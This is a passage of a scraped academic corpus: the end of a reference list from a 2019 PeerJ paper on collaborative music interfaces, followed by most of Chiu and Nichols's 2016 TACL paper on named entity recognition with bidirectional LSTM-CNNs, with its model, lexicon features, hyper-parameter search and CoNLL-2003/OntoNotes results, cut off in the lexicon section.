357–385. Scott SD, Carpendale MST, Inkpen KM. 2004. Territoriality in collaborative tabletop workspaces. In: Proceedings of the 2004 ACM conference on computer supported cooperative work. New York: ACM, 294–303. Shen C, Everitt K, Ryall K. 2003. UbiTable: impromptu face-to-face collaboration on horizontal interactive surfaces. In: Dey AK, Schmidt A, McCarthy JF, eds. UbiComp 2003: ubiquitous computing. UbiComp 2003. Lecture notes in computer science, vol. 2864. Berlin, Heidelberg: Springer, 281–288. Steuer J. 1992. Defining virtual reality: dimensions determining telepresence. Journal of Communication 42(4):73–93. Sugimoto M, Hosoi K, Hashizume H. 2004. Caretta: a system for supporting face-to- face collaboration by integrating personal and shared spaces. In: Proceedings of the SIGCHI conference on Human factors in computing systems. New York: ACM, 41–48. Tang JC. 1991. Findings from observational studies of collaborative work. International Journal of Man-machine studies 34(2):143–160 DOI 10.1016/0020-7373(91)90039-A. Titon JT, Slobin M. 1996. The music-culture as a world of music. In: Worlds of music: an introduction to the music of the world’s peoples. New York: Schirmer Books. Turchet L, Fischione C, Essl G, Keller D, Barthet M. 2018. Internet of musical things: Vi- sion and challenges. IEEE Access 6:61994–62017 DOI 10.1109/ACCESS.2018.2872625. Wang G. 2009. Designing Smule’s Ocarina: the iPhone’s magic flute. In: Proceedings of the 2009 conference on new interfaces for musical expression (NIME). 303–307. Xambó A, Hornecker E, Marshall P, Jordà S, Dobbyn C, Laney R. 2013. Let’s jam the reactable: Peer learning during musical improvisation with a tabletop tangible interface. ACM Transactions on Computer-Human Interaction 20(6):Article 36. Yin RK. 2017. Case study research and applications: design and methods. Thousand Oaks: Sage Publications. Zhang X, Furnas GW. 2003. The effectiveness of multiscale collaboration in virtual environments. In: CHI’03 extended abstracts on human factors in computing systems. New York: ACM, 790–791. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 39/39 https://peerj.com http://dx.doi.org/10.1162/105474601300343603 http://dx.doi.org/10.1016/0020-7373(91)90039-A http://dx.doi.org/10.1109/ACCESS.2018.2872625 http://dx.doi.org/10.7717/peerj-cs.229 work_6gjuzkl6kbevxi5nkkalt7xhgm ---- Named Entity Recognition with Bidirectional LSTM-CNNs Jason P.C. Chiu University of British Columbia jsonchiu@gmail.com Eric Nichols Honda Research Institute Japan Co.,Ltd. e.nichols@jp.honda-ri.com Abstract Named entity recognition is a challenging task that has traditionally required large amounts of knowledge in the form of feature engineer- ing and lexicons to achieve high performance. In this paper, we present a novel neural net- work architecture that automatically detects word- and character-level features using a hy- brid bidirectional LSTM and CNN architec- ture, eliminating the need for most feature en- gineering. We also propose a novel method of encoding partial lexicon matches in neu- ral networks and compare it to existing ap- proaches. Extensive evaluation shows that, given only tokenized text and publicly avail- able word embeddings, our system is com- petitive on the CoNLL-2003 dataset and sur- passes the previously reported state of the art performance on the OntoNotes 5.0 dataset by 2.13 F1 points. By using two lexicons con- structed from publicly-available sources, we establish new state of the art performance with an F1 score of 91.62 on CoNLL-2003 and 86.28 on OntoNotes, surpassing systems that employ heavy feature engineering, proprietary lexicons, and rich entity linking information. 1 Introduction Named entity recognition is an important task in NLP. High performance approaches have been dom- inated by applying CRF, SVM, or perceptron models to hand-crafted features (Ratinov and Roth, 2009; Passos et al., 2014; Luo et al., 2015). However, Collobert et al. (2011b) proposed an effective neu- ral network model that requires little feature engi- neering and instead learns important features from word embeddings trained on large quantities of un- labelled text – an approach made possible by recent advancements in unsupervised learning of word em- beddings on massive amounts of data (Collobert and Weston, 2008; Mikolov et al., 2013) and neural net- work training algorithms permitting deep architec- tures (Rumelhart et al., 1986). Unfortunately there are many limitations to the model proposed by Collobert et al. (2011b). First, it uses a simple feed-forward neural network, which restricts the use of context to a fixed sized window around each word – an approach that discards use- ful long-distance relations between words. Second, by depending solely on word embeddings, it is un- able to exploit explicit character level features such as prefix and suffix, which could be useful especially with rare words where word embeddings are poorly trained. We seek to address these issues by propos- ing a more powerful neural network model. A well-studied solution for a neural network to process variable length input and have long term memory is the recurrent neural network (RNN) (Goller and Kuchler, 1996). Recently, RNNs have shown great success in diverse NLP tasks such as speech recognition (Graves et al., 2013), machine translation (Cho et al., 2014), and language mod- eling (Mikolov et al., 2011). The long-short term memory (LSTM) unit with the forget gate allows highly non-trivial long-distance dependencies to be easily learned (Gers et al., 2000). For sequential la- belling tasks such as NER and speech recognition, a bi-directional LSTM model can take into account an effectively infinite amount of context on both sides of a word and eliminates the problem of limited con- text that applies to any feed-forward model (Graves et al., 2013). While LSTMs have been studied in the past for the NER task by Hammerton (2003), the lack of computational power (which led to the use 357 Transactions of the Association for Computational Linguistics, vol. 4, pp. 357–370, 2016. Action Editor: Masaaki Nagata. Submission batch: 11/2015; Revision batch: 3/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. We saw paintings of Picasso Word Embedding Additional Word Features CNN-extracted Char Features LSTM LSTM LSTM LSTM LSTM LSTM LSTM LSTM LSTM LSTM Out Out Out Out Out 0 0 Forward LSTM Backward LSTM Output Layers Tag Scores O O O O S-PER Best Tag Sequence Figure 1: The (unrolled) BLSTM for tagging named en- tities. Multiple tables look up word-level feature vectors. The CNN (Figure 2) extracts a fixed length feature vector from character-level features. For each word, these vec- tors are concatenated and fed to the BLSTM network and then to the output layers (Figure 3). of very small models) and quality word embeddings limited their effectiveness. Convolutional neural networks (CNN) have also been investigated for modeling character-level in- formation, among other NLP tasks. Santos et al. (2015) and Labeau et al. (2015) successfully em- ployed CNNs to extract character-level features for use in NER and POS-tagging respectively. Collobert et al. (2011b) also applied CNNs to semantic role la- beling, and variants of the architecture have been ap- plied to parsing and other tasks requiring tree struc- tures (Blunsom et al., 2014). However, the effec- tiveness of character-level CNNs has not been eval- uated for English NER. While we considered using character-level bi-directional LSTMs, which was re- cently proposed by Ling et al. (2015) for POS- tagging, preliminary evaluation shows that it does not perform significantly better than CNNs while be- ing more computationally expensive to train. Our main contribution lies in combining these neural network models for the NER task. We present a hybrid model of bi-directional LSTMs and CNNs Padding P o Padding Character Embedding Additional Char Features i c a s s Convolution Max CNN-extracted Char features Figure 2: The convolutional neural network extracts char- acter features from each word. The character embed- ding and (optionally) the character type feature vector are computed through lookup tables. Then, they are concate- nated and passed into the CNN. that learns both character- and word-level features, presenting the first evaluation of such an architec- ture on well-established English language evalua- tion datasets. Furthermore, as lexicons are crucial to NER performance, we propose a new lexicon encod- ing scheme and matching algorithm that can make use of partial matches, and we compare it to the sim- pler approach of Collobert et al. (2011b). Extensive evaluation shows that our proposed method estab- lishes a new state of the art on both the CoNLL-2003 NER shared task and the OntoNotes 5.0 datasets. 2 Model Our neural network is inspired by the work of Col- lobert et al. (2011b), where lookup tables transform discrete features such as words and characters into continuous vector representations, which are then concatenated and fed into a neural network. Instead of a feed-forward network, we use the bi-directional long-short term memory (BLSTM) network. To in- duce character-level features, we use a convolutional neural network, which has been successfully applied to Spanish and Portuguese NER (Santos et al., 2015) and German POS-tagging (Labeau et al., 2015). 2.1 Sequence-labelling with BLSTM Following the speech-recognition framework out- lined by Graves et al. (2013), we employed 358 LSTM LSTM Forward Backward Linear Log-Softmax Add Figure 3: The output layers (“Out” in Figure 1) decode output into a score for each tag category. a stacked1 bi-directional recurrent neural network with long short-term memory units to transform word features into named entity tag scores. Figures 1, 2, and 3 illustrate the network in detail. The extracted features of each word are fed into a forward LSTM network and a backward LSTM net- work. The output of each network at each time step is decoded by a linear layer and a log-softmax layer into log-probabilities for each tag category. These two vectors are then simply added together to pro- duce the final output. We tried minor variants of output layer architec- ture and selected the one that performed the best in preliminary experiments. 2.2 Extracting Character Features Using a Convolutional Neural Network For each word we employ a convolution and a max layer to extract a new feature vector from the per- character feature vectors such as character embed- dings (Section 2.3.2) and (optionally) character type (Section 2.5). Words are padded with a number of special PADDING characters on both sides depend- ing on the window size of the CNN. The hyper-parameters of the CNN are the window size and the output vector size. 1For each direction (forward and backward), the input is fed into multiple layers of LSTM units connected in sequence (i.e. LSTM units in the second layer take in the output of the first layer, and so on); the number of layers is a tuned hyper- parameter. Figure 1 shows only one unit for simplicity. Category SENNA DBpedia Location 36,697 709,772 Miscellaneous 4,722 328,575 Organization 6,440 231,868 Person 123,283 1,074,363 Total 171,142 2,344,578 Table 1: Number of entries for each category in the SENNA lexicon and our DBpedia lexicon. Dataset Train Dev Test CoNLL-2003 204,567 51,578 46,666 (23,499) (5,942) (5,648) OntoNotes 5.0 1,088,503 147,724 152,728 / CoNLL-2012 (81,828) (11,066) (11,257) Table 2: Dataset sizes in number of tokens (entities) 2.3 Core Features 2.3.1 Word Embeddings Our best model uses the publicly available 50- dimensional word embeddings released by Collobert et al. (2011b)2, which were trained on Wikipedia and the Reuters RCV-1 corpus. We also experimented with two other sets of pub- lished embeddings, namely Stanford’s GloVe em- beddings3 trained on 6 billion words from Wikipedia and Web text (Pennington et al., 2014) and Google’s word2vec embeddings4 trained on 100 billion words from Google News (Mikolov et al., 2013). In addition, as we hypothesized that word em- beddings trained on in-domain text may perform better, we also used the publicly available GloVe (Pennington et al., 2014) program and an in-house re-implementation5 of the word2vec (Mikolov et al., 2013) program to train word embeddings on Wikipedia and Reuters RCV1 datasets as well.6 Following Collobert et al. (2011b), all words are lower-cased before passing through the lookup table 2http://ml.nec-labs.com/senna/ 3http://nlp.stanford.edu/projects/glove/ 4https://code.google.com/p/word2vec/ 5We used our in-house reimplementation to train word vec- tors because it uses distributed processing to train much quicker than the publicly-released implementation of word2vec and its performance on the word analogy task was higher than reported by Mikolov et al. (2013). 6While Collobert et al. (2011b) used Wikipedia text from 2007, we used Wikipedia text from 2011. 359 http://ml.nec-labs.com/senna/ http://nlp.stanford.edu/projects/glove/ https://code.google.com/p/word2vec/ Text Hayao Tada , commander of the Japanese North China Area Army LOC - - - - - B I - S - - MISC - - - S B B I S S S S ORG - - - - - B I B I I E PERS B E - - - - - - S - - Figure 4: Example of how lexicon features are applied. The B, I, E, markings indicate that the token matches the Begin, Inside, and End token of an entry in the lexicon. S indicates that the token matches a single-token entry. to convert to their corresponding embeddings. The pre-trained embeddings are allowed to be modified during training.7 2.3.2 Character Embeddings We randomly initialized a lookup table with val- ues drawn from a uniform distribution with range [−0.5,0.5] to output a character embedding of 25 dimensions. The character set includes all unique characters in the CoNLL-2003 dataset8 plus the special tokens PADDING and UNKNOWN. The PADDING token is used for the CNN, and the UNKNOWN token is used for all other characters (which appear in OntoNotes). The same set of ran- dom embeddings was used for all experiments.9 2.4 Additional Word-level Features 2.4.1 Capitalization Feature As capitalization information is erased during lookup of the word embedding, we evaluate Col- lobert’s method of using a separate lookup table to add a capitalization feature with the following op- tions: allCaps, upperInitial, lowercase, mixedCaps, noinfo (Collobert et al., 2011b). This method is compared with the character type feature (Section 2.5) and character-level CNNs. 2.4.2 Lexicons Most state of the art NER systems make use of lexicons as a form of external knowledge (Ratinov 7Preliminary experiments showed that modifiable vectors performed better than so-called “frozen vectors.” 8Upper and lower case letters, numbers, and punctuations 9We did not experiment with other settings because the En- glish character set is small enough that effective embeddings could be learned directly from the task data. 10By increments of 50. 11Determined by evaluating dev set performance. 12Probability of discarding any LSTM output node. 13Mini-batch size was excluded from the round 2 particle swarm hyper-parameter search space due to time constraints. and Roth, 2009; Passos et al., 2014). For each of the four categories (Person, Organization, Location, Misc) defined by the CoNLL 2003 NER shared task, we compiled a list of known named entities from DBpedia (Auer et al., 2007), by extracting all descendants of DB- pedia types corresponding to the CoNLL cate- gories.14 We did not construct separate lexicons for the OntoNotes tagset because correspondences be- tween DBpedia categories and its tags could not be found in many instances. In addition, for each entry we first removed parentheses and all text contained within, then stripped trailing punctuation,15 and fi- nally tokenized it with the Penn Treebank tokeniza- tion script for the purpose of partial matching. Ta- ble 1 shows the size of each category in our lexicon compared to Collobert’s lexicon, which we extracted from their SENNA system. Figure 4 shows an example of how the lexicon features are applied.16 For each lexicon category, we match every n-gram (up to the length of the longest lexicon entry) against entries in the lexicon. A match is successful when the n-gram matches the prefix or suffix of an entry and is at least half the length of the entry. Because of the high potential for spuri- ous matches, for all categories except Person, we discard partial matches less than 2 tokens in length. When there are multiple overlapping matches within the same category, we prefer exact matches over par- tial matches, and then longer matches over shorter matches, and finally earlier matches in the sentence over later matches. All matches are case insensitive. For each token in the match, the feature is en- 14The Miscellaneous category was populated by entities of the DBpedia categories Artifact and Work. 15The punctuation stripped was period, comma, semi-colon, colon, forward slash, backward slash, and question mark. 16As can been seen in this example, the lexicons – in partic- ular Miscellaneous – still contain a lot of noise. 360 Hyper-parameter CoNLL-2003 (Round 2) OntoNotes 5.0 (Round 1) Final Range Final Range Convolution width 3 [3,7] 3 [3,9] CNN output size 53 [15,84] 20 [15,100] LSTM state size 275 [100,500] 200 [100,400]10 LSTM layers 1 [1,4] 2 [2,4] Learning rate 0.0105 [10−3,10−1.8] 0.008 [10−3.5,10−1.5] Epochs11 80 - 18 - Dropout12 0.68 [0.25,0.75] 0.63 [0,1] Mini-batch size 9 -13 9 [5,14] Table 3: Hyper-parameter search space and final values used for all experiments Round CoNLL-2003 OntoNotes 5.0 1 93.82 (± 0.15) 84.57 (± 0.27) 2 94.03 (± 0.23) 84.47 (± 0.29) Table 4: Development set F1 score performance of the best hyper-parameter settings in each optimization round. coded in BIOES annotation (Begin, Inside, Outside, End, Single), indicating the position of the token in the matched entry. In other words, B will not appear in a suffix-only partial match, and E will not appear in a prefix-only partial match. As we will see in Section 4.5, we found that this more sophisticated method outperforms the method presented by Collobert et al. (2011b), which treats partial and exact matches equally, allows prefix but not suffix matches, allows very short partial matches, and marks tokens with YES/ NO. In addition, since Collobert et al. (2011b) released their lexicon with their SENNA system, we also ap- plied their lexicon to our model for comparison and investigated using both lexicons simultaneously as distinct features. We found that the two lexicons complement each other and improve performance on the CoNLL-2003 dataset. Our best model uses the SENNA lexicon with ex- act matching and our DBpedia lexicon with partial matching, with BIOES annotation in both cases. 2.5 Additional Character-level Features A lookup table was used to output a 4-dimensional vector representing the type of the character (upper case, lower case, punctuation, other). 2.6 Training and Inference 2.6.1 Implementation We implement the neural network using the torch7 library (Collobert et al., 2011a). Training and inference are done on a per-sentence level. The ini- tial states of the LSTM are zero vectors. Except for the character and word embeddings whose initializa- tion has been described previously, all lookup tables are randomly initialized with values drawn from the standard normal distribution. 2.6.2 Objective Function and Inference We train our network to maximize the sentence- level log-likelihood from Collobert et al. (2011b).17 First, we define a tag-transition matrix A where Ai,j represents the score of jumping from tag i to tag j in successive tokens, and A0,i as the score for starting with tag i. This matrix of parameters are also learned. Define θ as the set of parameters for the neural network, and θ′ = θ ∪{Ai,j ∀i,j} as the set of all parameters to be trained. Given an exam- ple sentence, [x]T1 , of length T , and define [fθ]i,t as the score outputted by the neural network for the tth word and ith tag given parameters θ, then the score of a sequence of tags [i]T1 is given as the sum of net- work and transition scores: S([x]T1 , [i] T 1 ,θ ′) = T∑ t=1 ( A[i]t−1,[i]t + [fθ][i]t,t ) 17Much later, we discovered that training with cross entropy objective while performing Viterbi decoding to restrict output to valid tag sequences also appears to work just as well. 361 Model CoNLL-2003 OntoNotes 5.0 Prec. Recall F1 Prec. Recall F1 FFNN + emb + caps + lex 89.54 89.80 89.67 (± 0.24) 74.28 73.61 73.94 (± 0.43) BLSTM 80.14 72.81 76.29 (± 0.29) 79.68 75.97 77.77 (± 0.37) BLSTM-CNN 83.48 83.28 83.38 (± 0.20) 82.58 82.49 82.53 (± 0.40) BLSTM-CNN + emb 90.75 91.08 90.91 (± 0.20) 85.99 86.36 86.17 (± 0.22) BLSTM-CNN + emb + lex 91.39 91.85 91.62 (± 0.33) 86.04 86.53 86.28 (± 0.26) Collobert et al. (2011b) - - 88.67 - - - Collobert et al. (2011b) + lexicon - - 89.59 - - - Huang et al. (2015) - - 90.10 - - - Ratinov and Roth (2009)18 91.20 90.50 90.80 82.00 84.95 83.45 Lin and Wu (2009) - - 90.90 - - - Finkel and Manning (2009)19 - - - 84.04 80.86 82.42 Suzuki et al. (2011) - - 91.02 - - - Passos et al. (2014)20 - - 90.90 - - 82.24 Durrett and Klein (2014) - - - 85.22 82.89 84.04 Luo et al. (2015)21 91.50 91.40 91.20 - - - Table 5: Results of our models, with various feature sets, compared to other published results. The three sections are, in order, our models, published neural network models, and published non-neural network models. For the features, emb = Collobert word embeddings, caps = capitalization feature, lex = lexicon features from both SENNA and DBpedia lexicons. For F1 scores, standard deviations are in parentheses. Then, letting [y]T1 be the true tag sequence, the sentence-level log-likelihood is obtained by normal- izing the above score over all possible tag-sequences [j]T1 using a softmax: log P([y]T1 | [x]T1 ,θ′) = S([x]T1 , [y] T 1 ,θ ′)− log ∑ ∀[j]T1 eS([x] T 1 ,[j] T 1 ,θ ′) This objective function and its gradients can be ef- ficiently computed by dynamic programming (Col- lobert et al., 2011b). At inference time, given neural network out- puts [fθ]i,t we use the Viterbi algorithm to find the tag sequence [i]T1 that maximizes the score S([x]T1 , [i] T 1 ,θ ′). 2.6.3 Tagging Scheme The output tags are annotated with BIOES (which stand for Begin, Inside, Outside, End, Single, indicating the position of the token in the 18OntoNotes results taken from (Durrett and Klein, 2014) 19Evaluation on OntoNotes 5.0 done by Pradhan et al. (2013) 20Not directly comparable as they evaluated on an earlier ver- sion of the corpus with a different data split. 21Numbers taken from the original paper (Luo et al., 2015). While the precision, recall, and F1 scores are clearly inconsis- tent, it is unclear in which way they are incorrect. entity) as this scheme has been reported to outper- form others such as BIO (Ratinov and Roth, 2009). 2.6.4 Learning Algorithm Training is done by mini-batch stochastic gradi- ent descent (SGD) with a fixed learning rate. Each mini-batch consists of multiple sentences with the same number of tokens. We found applying dropout to the output nodes22 of each LSTM layer (Pham et al., 2014) was quite effective in reducing overfit- ting (Section 4.4). We explored other more sophis- ticated optimization algorithms such as momentum (Nesterov, 1983), AdaDelta (Zeiler, 2012), and RM- SProp (Hinton et al., 2012), and in preliminary ex- periments they did not improve upon plain SGD. 3 Evaluation Evaluation was performed on the well-established CoNLL-2003 NER shared task dataset (Tjong Kim Sang and De Meulder, 2003) and the much larger but less-studied OntoNotes 5.0 dataset (Hovy et al., 2006; Pradhan et al., 2013). Table 2 gives an overview of these two different datasets. For each experiment, we report the average and standard deviation of 10 successful trials. 22Adding dropout to inputs seems to have an adverse effect. 362 Features BLSTM BLSTM-CNN BLSTM-CNN + lex CoNLL OntoNotes CoNLL OntoNotes CoNLL OntoNotes none 76.29 (± 0.29) 77.77 (± 0.37) 83.38 (± 0.20) 82.53 (± 0.40) 87.77 (± 0.29) 83.82 (± 0.19) emb 88.23 (± 0.23) 82.72 (± 0.23) 90.91 (± 0.20) 86.17 (± 0.22) 91.62 (± 0.33) 86.28 (± 0.26) emb + caps 90.67 (± 0.16) 86.19 (± 0.25) 90.98 (± 0.18) 86.35 (± 0.28) 91.55 (± 0.19)* 86.28 (± 0.32)* emb + caps + lex 91.43 (± 0.17) 86.21 (± 0.16) 91.55 (± 0.19)* 86.28 (± 0.32)* 91.55 (± 0.19)* 86.28 (± 0.32)* emb + char - - 90.88 (± 0.48) 86.08 (± 0.40) 91.44 (± 0.23) 86.34 (± 0.18) emb + char + caps - - 90.88 (± 0.31) 86.41 (± 0.22) 91.48 (± 0.23) 86.33 (± 0.26) Table 6: F1 score results of BLSTM and BLSTM-CNN models with various additional features; emb = Collobert word embeddings, char = character type feature, caps = capitalization feature, lex = lexicon features. Note that starred results are repeated for ease of comparison. 3.1 Dataset Preprocessing For all datasets, we performed the following pre- processing: • All digit sequences are replaced by a single “0”. • Before training, we group sentences by word length into mini-batches and shuffle them. In addition, for the OntoNotes dataset, in order to handle the Date, Time, Money, Percent, Quantity, Ordinal, and Cardinal named en- tity tags, we split tokens before and after every digit. 3.2 CoNLL 2003 Dataset The CoNLL-2003 dataset (Tjong Kim Sang and De Meulder, 2003) consists of newswire from the Reuters RCV1 corpus tagged with four types of named entities: location, organization, person, and miscellaneous. As the dataset is small compared to OntoNotes, we trained the model on both the train- ing and development sets after performing hyper- parameter optimization on the development set. 3.3 OntoNotes 5.0 Dataset Pradhan et al. (2013) compiled a core portion of the OntoNotes 5.0 dataset for the CoNLL-2012 shared task and described a standard train/dev/test split, which we use for our evaluation. Following Durrett and Klein (2014), we applied our model to the por- tion of the dataset with gold-standard named entity annotations; the New Testaments portion was ex- cluded for lacking gold-standard annotations. This dataset is much larger than CoNLL-2003 and con- sists of text from a wide variety of sources, such as broadcast conversation, broadcast news, newswire, magazine, telephone conversation, and Web text. 3.4 Hyper-parameter Optimization We performed two rounds of hyper-parameter opti- mization and selected the best settings based on de- velopment set performance23. Table 3 shows the fi- nal hyper-parameters, and Table 4 shows the dev set performance of the best models in each round. In the first round, we performed random search and selected the best hyper-parameters over the de- velopment set of the CoNLL-2003 data. We evalu- ated around 500 hyper-parameter settings. Then, we took the same settings and tuned the learning rate and epochs on the OntoNotes development set. 24 For the second round, we performed independent hyper-parameter searches on each dataset using Op- tunity’s implementation of particle swarm (Claesen et al., ), as there is some evidence that it is more efficient than random search (Clerc and Kennedy, 2002). We evaluated 500 hyper-parameter settings this round as well. As we later found out that train- ing fails occasionally (Section 3.5) as well as large variation from run to run, we ran the top 5 settings from each dataset for 10 trials each and selected the best one based on averaged dev set performance. For CoNLL-2003, we found that particle swarm produced better hyper-parameters than random search. However, surprisingly for OntoNotes par- ticle swarm was unable to produce better hyper- parameters than those from the ad-hoc approach in round 1. We also tried tuning the CoNLL-2003 hyper-parameters from round 2 for OntoNotes and that was not any better25 either. We trained CoNLL-2003 models for a large num- 23Hyper-parameter optimization was done with the BLSTM- CNN + emb + lex feature set, as it had the best performance. 24Selected based on dev set performance of a few runs. 25The result is 84.41 (± 0.33) on the OntoNotes dev set. 363 Word Embeddings CoNLL-2003 OntoNotes Random 50d 87.77 (± 0.29) 83.82 (± 0.19) Random 300d 87.84 (± 0.23) 83.76 (± 0.37) GloVe 6B 50d 91.09 (± 0.15) 86.25 (± 0.24) GloVe 6B 300d 90.71 (± 0.21) 86.26 (± 0.30) Google 100B 300d 90.60 (± 0.23) 85.34 (± 0.25) Collobert 50d 91.62 (± 0.33) 86.28 (± 0.26) Our GloVe 50d 91.41 (± 0.21) 86.24 (± 0.35) Our Skip-gram 50d 90.76 (± 0.23) 85.70 (± 0.29) Table 7: F1 scores when the Collobert word vectors are replaced. We tried 50- and 300-dimensional random vec- tors (Random 50d, Random 300d); GloVe’s released vec- tors trained on 6 billion words (GloVe 6B 50d, GloVe 6B 300d); Google’s released 300-dimensional vectors trained on 100 billion words from Google News (Google 100B 300d); and 50-dimensional GloVe and word2vec skip-gram vectors that we trained on Wikipedia and Reuters RCV-1 (Our GloVe 50d, Our Skip-gram 50d). ber of epochs because we observed that the models did not exhibit overtraining and instead continued to slowly improve on the development set long af- ter reaching near 100% accuracy on the training set. In contrast, despite OntoNotes being much larger than CoNLL-2003, training for more than about 18 epochs causes performance on the development set to decline steadily due to overfitting. 3.5 Excluding Failed Trials On the CoNLL-2003 dataset, while BLSTM models completed training without difficulty, the BLSTM- CNN models fail to converge around 5∼10% of the time depending on feature set. Similarly, on OntoNotes, 1.5% of trials fail. We found that using a lower learning rate reduces failure rate. We also tried clipping gradients and using AdaDelta and both of them were effective at eliminating such failures by themselves. AdaDelta, however, made training more expensive with no gain in model performance. In any case, for all experiments we excluded trials where the final F1 score on a subset of training data falls below a certain threshold, and continued to run trials until we obtained 10 successful ones. For CoNLL-2003, we excluded trials where the final F1 score on the development set was less than 95; there was no ambiguity in selecting the threshold as every trial scored either above 98 or below 90. For OntoNotes, the threshold was a F1 score of 80 on the last 5,000 sentences of the training set; every trial scored either above 80 or below 75. 3.6 Training and Tagging Speed On an Intel Xeon E5-2697 processor, training takes about 6 hours while tagging the test set takes about 12 seconds for CoNLL-2003. The times are 10 hours and 60 seconds respectively for OntoNotes. 4 Results and Discussion Table 5 shows the results for all datasets. To the best of our knowledge, our best models have sur- passed the previous highest reported F1 scores for both CoNLL-2003 and OntoNotes. In particular, with no external knowledge other than word em- beddings, our model is competitive on the CoNLL- 2003 dataset and establishes a new state of the art for OntoNotes, suggesting that given enough data, the neural network automatically learns the relevant features for NER without feature engineering. 4.1 Comparison with FFNNs We re-implemented the FFNN model of Collobert et al. (2011b) as a baseline for comparison. Ta- ble 5 shows that while performing reasonably well on CoNLL-2003, FFNNs are clearly inadequate for OntoNotes, which has a larger domain, showing that LSTM models are essential for NER. 4.2 Character-level CNNs vs. Character Type and Capitalization Features The comparison of models in Table 6 shows that on CoNLL-2003, BLSTM-CNN models significantly26 outperform the BLSTM models when given the same feature set. This effect is smaller and not sta- tistically significant on OntoNotes when capitaliza- tion features are added. Adding character type and capitalization features to the BLSTM-CNN mod- els degrades performance for CoNLL and mostly improves performance on OntoNotes, suggesting character-level CNNs can replace hand-crafted char- acter features in some cases, but systems with weak lexicons may benefit from character features. 26Wilcoxon rank sum test, p < 0.05 when comparing the four BLSTM models with the corresponding BLSTM-CNN models using the same feature set. The Wilcoxon rank sum test was selected for its robustness against small sample sizes when the distribution is unknown. 364 Dropout CoNLL-2003 OntoNotes 5.0 Dev Test Dev Test - 93.72 (± 0.10) 90.76 (± 0.22) 82.02 (± 0.49) 84.06 (± 0.50) 0.10 93.85 (± 0.18) 90.87 (± 0.31) 83.01 (± 0.39) 84.94 (± 0.25) 0.30 94.08 (± 0.17) 91.09 (± 0.18) 83.61 (± 0.32) 85.44 (± 0.33) 0.50 94.19 (± 0.18) 91.14 (± 0.35) 84.35 (± 0.23) 86.36 (± 0.28) 0.63 - - 84.47 (± 0.23) 86.29 (± 0.25) 0.68 94.31 (± 0.15) 91.23 (± 0.16) - - 0.70 94.31 (± 0.24) 91.17 (± 0.37) 84.56 (± 0.40) 86.17 (± 0.25) 0.90 94.17 (± 0.17) 90.67 (± 0.17) 81.38 (± 0.19) 82.16 (± 0.18) Table 8: F1 score results with various dropout values. Models were trained using only the training set for each dataset. All other experiments use dropout = 0.68 for CoNLL-2003 and dropout = 0.63 for OntoNotes 5.0. 4.3 Word Embeddings Table 5 and Table 7 show that we obtain a large, sig- nificant27 improvement when trained word embed- dings are used, as opposed to random embeddings, regardless of the additional features used. This is consistent with Collobert et. al. (2011b)’s results. Table 7 compares the performance of different word embeddings in our best model in Table 5 (BLSTM-CNN + emb + lex). For CoNLL-2003, the publicly available GloVe and Google embeddings are about one point behind Collobert’s embeddings. For OntoNotes, GloVe embeddings perform close to Collobert embeddings while Google embeddings are again one point behind. In addition, 300 dimen- sional embeddings present no significant improve- ment over 50 dimensional embeddings – a result pre- viously reported by Turian et al. (2010). One possible reason that Collobert embeddings perform better than other publicly available em- beddings on CoNLL-2003 is that they are trained on the Reuters RCV-1 corpus, the source of the CoNLL-2003 dataset, whereas the other embed- dings are not28. On the other hand, we suspect that Google’s embeddings perform poorly because of vo- cabulary mismatch - in particular, Google’s embed- dings were trained in a case-sensitive manner, and embeddings for many common punctuations and 27Wilcoxon rank sum test, p < 0.001 28To make a direct comparison to Collobert et al. (2011b), we do not exclude the CoNLL-2003 NER task test data from the word vector training data. While it is possible that this differ- ence could be responsible for the disparate performance of word vectors, the CoNLL-2003 training data comprises only 20k out of 800 million words, or 0.00002% of the total data; in an un- supervised training scheme, the effects are likely negligible. symbols were not provided. To test these hypothe- ses, we performed experiments with new word em- beddings trained using GloVe and word2vec, with vocabulary list and corpus similar to Collobert et. al. (2011b). As shown in Table 7, our GloVe embeddings improved significantly29 over publicly available embeddings on CoNLL-2003, and our word2vec skip-gram embeddings improved signifi- cantly30 over Google’s embeddings on OntoNotes. Due to time constraints we did not perform new hyper-parameter searches with any of the word em- beddings. As word embedding quality depends on hyper-parameter choice during their training (Pen- nington et al., 2014), and also, in our NER neural network, hyper-parameter choice is likely sensitive to the type of word embeddings used, optimizing them all will likely produce better results and pro- vide a fairer comparison of word embedding quality. 4.4 Effect of Dropout Table 8 compares the result of various dropout val- ues for each dataset. The models are trained using only the training set for each dataset to isolate the effect of dropout on both dev and test sets. All other hyper-parameters and features remain the same as our best model in Table 5. In both datasets and on both dev and test sets, dropout is essential for state of the art performance, and the improvement is statisti- cally significant31. Dropout is optimized on the dev set, as described in Section 3.4. Hence, the chosen 29Wilcoxon rank sum test, p < 0.01 30Wilcoxon rank sum test, p < 0.01 31Wilcoxon rank sum test, no dropout vs. best setting: p < 0.001 for the CoNLL-2003 test set, p < 0.0001 for the OntoNotes 5.0 test set, p < 0.0005 for all others. 365 L O C M IS C O R G P E R N o t N E C A R D IN A L D A T E M O N E Y O R D IN A L P E R C E N T Q U A L IT Y T IM E L O C F A C G P E N O R P O R G P E R S O N E V E N T L A N G L A W P R O D U C T W O R K N o n -N E LOC MISC ORG PER Any Entity Tag Lexicon Match CoNLL OntoNotes Figure 5: Fraction of named entities of each tag category matched completely by entries in each lexicon category of the SENNA/DBpedia combined lexicon. White = higher fraction. value may not be the best-performing in Table 8. 4.5 Lexicon Features Table 6 shows that on the CoNLL-2003 dataset, us- ing features from both the SENNA lexicon and our proposed DBpedia lexicon provides a significant32 improvement and allows our model to clearly sur- pass the previous state of the art. Unfortunately the difference is minuscule for OntoNotes, most likely because our lexicon does not match DBpedia categories well. Figure 5 shows that on CoNLL-2003, lexicon coverage is reasonable and matches the tags set for everything except the catch- all MISC category. For example, LOC entries in lexicon match mostly LOC named entities and vice versa. However, on OntoNotes, the matches are noisy and correspondence between lexicon match and tag category is quite ambiguous. For example, all lexicon categories have spurious matches in un- related named entities like CARDINAL, and LOC, GPE, and LANGUAGE entities all get a lot of matches from the LOC category in the lexicon. In addition, named entities in categories like NORP, ORG, LAW, PRODUCT receive little coverage. The lower cover- age, noise, and ambiguity all contribute to the dis- appointing performance. This suggests that the DB- pedia lexicon construction method needs to be im- proved. A reasonable place to start would be the DBpedia category to OntoNotes NE tag mappings. In order to isolate the contribution of each lexicon and matching method, we 